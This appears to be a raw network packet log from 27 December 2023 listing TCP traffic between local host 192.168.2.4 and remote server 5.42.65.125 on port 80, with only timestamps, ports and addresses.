Dec 27, 2023 17:57:25.461937904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.461955070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.462002039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.462549925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.462565899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.462626934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.463252068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.463299036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.463352919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.464160919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.464175940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.464204073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.464632034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.464647055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.464687109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.465464115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.465514898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.465517998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.466057062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.466114044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.466170073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.466649055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.466691971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.466697931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.467346907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.467363119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.467411041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.468036890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.468080044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.468089104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.468907118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.468919992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.468991995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.469374895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.469389915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.469435930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.470052958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.470068932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.470103025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.470701933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.470746994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.470752001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.471345901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.471384048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.471430063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.472012997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.472031116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.472060919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.472067118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.472127914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.473165989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.473181009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.473193884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.473227024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.473938942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.473956108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.473970890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.473995924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.474021912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.474977016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.474994898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.475008011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.475047112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.475863934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.475888014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.475903988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.475917101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.475950956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.476931095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.476947069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.476963997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.476993084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.477750063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.477766037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.477808952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.477828026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.477869987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.478732109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.478748083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.478760958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.478800058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.479763031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.479809046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.479818106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.479834080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.479902983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.480611086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.480628014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.480640888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.480695963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.481483936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.481529951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.481537104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.481547117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.482491016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.482506037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.482521057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.482546091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.482597113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.483465910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.483484030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.483498096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.483531952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.483546972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.484260082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.484280109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.484313011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.484339952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.485138893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.485156059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.485189915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.485193968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.485233068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.486016035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.486056089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.486072063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.486123085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.486985922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.487004042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.487018108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.487051010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.487080097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.487827063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.487845898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.487888098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.487894058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.488771915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.488790989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.488805056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.488840103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.488878012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.489634037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.489675999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.489691019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.489737034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.490468025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.490506887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.490521908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.490544081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.490566969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.491384983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.491400003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.491415024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.491491079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.492254019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.492269039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.492280960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.492302895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.492332935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.493206978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.493222952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.493237019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.493263960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.494065046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.494081020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.494096041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.494112015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.494163990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.494806051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.494831085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.494877100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.494968891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.495651960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.495706081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.495708942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.495726109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.495769978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.496490002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.496505976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.496542931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.496547937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.497500896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.497517109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.497530937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.497567892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.497601986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.498181105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.498197079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.498219013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.498244047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.499059916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.499078035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.499092102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.499126911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.499160051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.499906063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.499941111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.499955893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.499989033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.500790119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.500806093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.500864029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.501288891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.501310110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.501323938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.501346111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.501375914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.502051115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.502104044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.502120018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.502171040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.502968073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.502983093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.503004074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.503014088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.503047943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.503757000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.503803968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.503820896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.503865957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.504798889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.504813910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.504828930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.504842043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.504870892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.505441904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.505458117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.505471945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.505511045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.506371975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.506464005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.506479025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.506494045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.506520987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.507024050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.507044077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.507057905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.507087946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.507858992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.507932901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.508084059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.508100033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.508168936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.508649111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.508665085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.508677959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.508713007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.509450912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.509474039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.509496927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.509500027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.509542942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.510287046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.510322094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.510363102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.510411978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.511046886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.511095047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.511110067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.511138916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.511159897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.511892080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.511925936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.511941910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.511976957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.512658119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.512681007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.512696028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.512726068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.512741089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.513420105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.513441086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.513453960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.513494968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.514235020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.514251947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.514280081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.514750004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.514766932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.514780998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.514794111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.514843941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.515520096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.515537977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.515571117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.515584946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.516268015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.516283035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.516297102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.516330957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.516364098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.517117023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.517159939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.517174006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.517206907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.517805099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.517889023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.517925978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.517982960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.518001080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.518639088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.518697023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.518712044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.518748999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.519393921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.519408941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.519426107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.519435883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.519469976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.520545006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.520571947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.520590067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.520633936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.520916939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.520931005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.520945072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.520975113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.521003962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.521652937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.521668911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.521682978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.521712065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.522432089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.522469997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.522486925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.522519112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.522543907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.523152113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.523209095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.523221970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.523313999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.524012089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.524027109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.524040937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.524080038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.524094105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.524708033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.524729013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.524744034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.524770975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.525492907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.525507927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.525521994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.525544882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.525567055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.526174068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.526228905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.526243925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.526288033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.526964903 CET	80	49738	5.42.65.125	192.168.2.4
